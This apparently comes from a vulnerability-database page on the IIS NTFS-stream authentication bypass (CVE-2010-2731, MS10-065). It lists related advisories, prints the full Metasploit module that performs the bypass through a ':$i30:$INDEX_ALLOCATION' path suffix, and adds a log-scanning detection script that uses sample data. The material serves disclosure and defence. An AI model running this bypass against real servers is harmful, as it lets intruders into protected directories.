| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2010-2731 | 2 Jul 2010 00:00 | – | circl |
| Microsoft IIS Directory Authentication Bypass (MS10-065; CVE-2010-1899; CVE-2010-2731) | 14 Sep 2010 00:00 | – | checkpoint_advisories |
| CVE-2010-2731 | 15 Sep 2010 18:00 | – | cve |
| CVE-2010-2731 | 15 Sep 2010 18:00 | – | cvelist |
| Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS) | 3 Apr 2018 00:00 | – | nessus |
| IIS 5.x Alternate Data Stream Authentication Bypass | 5 Jul 2010 00:00 | – | nessus |
| MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960) | 14 Sep 2010 00:00 | – | nessus |
| MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) could allow remote code execution | 18 Jul 2012 18:49 | – | mskb |
| MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass | 25 Jun 2012 20:48 | – | metasploit |
| CVE-2010-2731 | 15 Sep 2010 19:00 | – | nvd |

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
        'Description' => %q{
          This module bypasses basic authentication for Internet Information Services (IIS).
          By appending the NTFS stream name to the directory name in a request, it is
          possible to bypass authentication.
        },
        'References' => [
          [ 'CVE', '2010-2731' ],
          [ 'OSVDB', '66160' ],
          [ 'MSB', 'MS10-065' ],
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
        ],
        'Author' => [
          'Soroush Dalili',
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2010-07-02'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])
      ]
    )
  end

  def has_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET'
    })
    vprint_status(res.body) if res

    return (res and res.code == 401)
  end

  def try_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"

    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'

    user = Rex::Text.rand_text_alpha(rand(5..14))
    pass = Rex::Text.rand_text_alpha(rand(5..14))

    vprint_status("Requesting: #{dir}")
    res = send_request_cgi({
      'uri' => dir,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
    vprint_status(res.body) if res

    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''
  end

  def run
    if !has_auth
      print_error('No basic authentication enabled')
      return
    end

    bypass_string = try_auth

    if bypass_string.empty?
      print_error('The bypass attempt did not work')
    else
      print_good("You can bypass auth by doing: #{bypass_string}")
    end
  end
end
```
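
A defender-side counterpart to the module above, added here as an example and not part of the Metasploit module or the original page: it scans IIS W3C logs for request paths carrying the `:$i30:$INDEX_ALLOCATION` suffix and applies the same 401/404 test as `try_auth` to separate served requests from rejected ones. The log lines, their field order, and the names `scan_iis_log` and `percent_decode` are constructed for illustration.

```ruby
# NTFS attribute suffix the module appends to the protected directory name.
STREAM_SUFFIX = /:\$i30:\$index_allocation/i

# Constructed IIS W3C extended log lines (sample data, not taken from the page).
SAMPLE_LOG = <<~'LOG'
  #Fields: date time c-ip cs-method cs-uri-stem sc-status
  2010-07-05 10:00:01 192.0.2.10 GET /secret/ 401
  2010-07-05 10:00:02 192.0.2.10 GET /secret:$i30:$INDEX_ALLOCATION/ 200
  2010-07-05 10:00:03 192.0.2.11 GET /secret%3A%24I30%3A%24Index_Allocation/default.asp 200
  2010-07-05 10:00:04 192.0.2.12 GET /public/index.htm 200
  2010-07-05 10:00:05 192.0.2.13 GET /secret:$i30:$INDEX_ALLOCATION/ 401
LOG

# Decode %XX escapes on raw bytes so an encoded ':' or '$' cannot hide the suffix.
def percent_decode(str)
  str.b.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# Returns one hash per request whose path contains the stream suffix.
def scan_iis_log(text)
  fields = []
  findings = []
  text.each_line do |raw|
    line = raw.strip
    if line.start_with?('#Fields:')
      fields = line.sub('#Fields:', '').split # column order comes from the log itself
      next
    end
    next if line.empty? || line.start_with?('#') || fields.empty?

    rec = fields.zip(line.split).to_h
    stem = percent_decode(rec['cs-uri-stem'].to_s)
    next unless stem.match?(STREAM_SUFFIX)

    status = rec['sc-status'].to_i
    # Same success test as try_auth: any status other than 401/404 means content was served.
    findings << { client: rec['c-ip'], path: stem, status: status, bypassed: ![401, 404].include?(status) }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  scan_iis_log(SAMPLE_LOG).each do |f|
    verdict = f[:bypassed] ? 'BYPASSED' : 'blocked'
    puts format('%-12s %-3d %-9s %s', f[:client], f[:status], verdict, f[:path])
  end
end
```
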